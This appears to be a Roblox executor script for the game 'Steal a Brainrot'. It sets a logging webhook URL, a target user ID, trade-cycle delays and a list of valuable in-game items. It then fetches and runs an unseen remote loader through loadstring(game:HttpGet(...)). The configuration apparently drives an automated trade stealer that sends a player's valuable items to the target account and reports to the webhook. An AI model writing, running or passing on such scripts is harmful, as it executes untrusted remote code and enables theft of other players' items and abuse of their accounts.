getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_a1da419a072945659e71f58c4ae7ca80"
getgenv().TARGET_ID = 7807063904
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Cooki and Milki"] = true,
    ["Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Garama and Madundung"] = true,
    ["Ginger Gerat"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Ketupat Bros"] = true,
    ["Ketupat Kepat"] = true,
    ["La Casa Boo"] = true,
    ["La Supreme Combinasion"] = true,
    ["Lavadorito Spinito"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Sekolahs"] = true,
    ["Los Spaghettis"] = true,
    ["Meowl"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Reinito Sleighito"] = true,
    ["Rosey and Teddy"] = true,
    ["Skibidi Toilet"] = true,
    ["Spooky and Pumpky"] = true,
    ["Strawberry Elephant"] = true,
    ["Swaggy Bros"] = true,
    ["Tang Tang Keletang"] = true,
    ["Tictac Sahur"] = true,
    ["Tralaledon"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()
